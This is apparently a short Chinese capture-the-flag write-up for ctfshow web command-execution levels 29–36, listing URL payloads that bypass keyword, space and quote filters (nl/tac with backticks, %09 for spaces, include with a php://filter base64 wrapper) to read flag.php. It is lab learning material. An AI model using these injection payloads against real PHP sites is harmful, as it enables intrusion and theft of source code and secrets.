ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
鸠摩智首席音效师20 小时前
如何使用 docker exec 在容器中运行命令 ?
运维·docker·容器
似水এ᭄往昔20 小时前
【Linux】自动化构建-make/Makefile
linux·运维·服务器·ubuntu
顶点多余21 小时前
Linux“信号“从硬件到软件详解
linux·运维·服务器
勘察加熊人21 小时前
ai飞卢小说自动化处理工作流获得提问素材
运维·自动化
瀚高PG实验室1 天前
rpm包安装报错:cannot open Packages index using db5 - Cannot allocate memory (12)
linux·运维·服务器·瀚高数据库
云计算老刘1 天前
2. DNS 服务器
运维
水星灭绝1 天前
win11+wsl2+docker
运维·docker·容器
追风少年王大爷丶1 天前
nginx 配置无域名访问拒绝
运维·服务器·nginx
AI+程序员在路上1 天前
嵌入式软件技术大全
linux·开发语言·arm开发·单片机
black方块cxy1 天前
实现一个输入框多个ip以逗号分隔最多20组,且ip不能重复
java·服务器·前端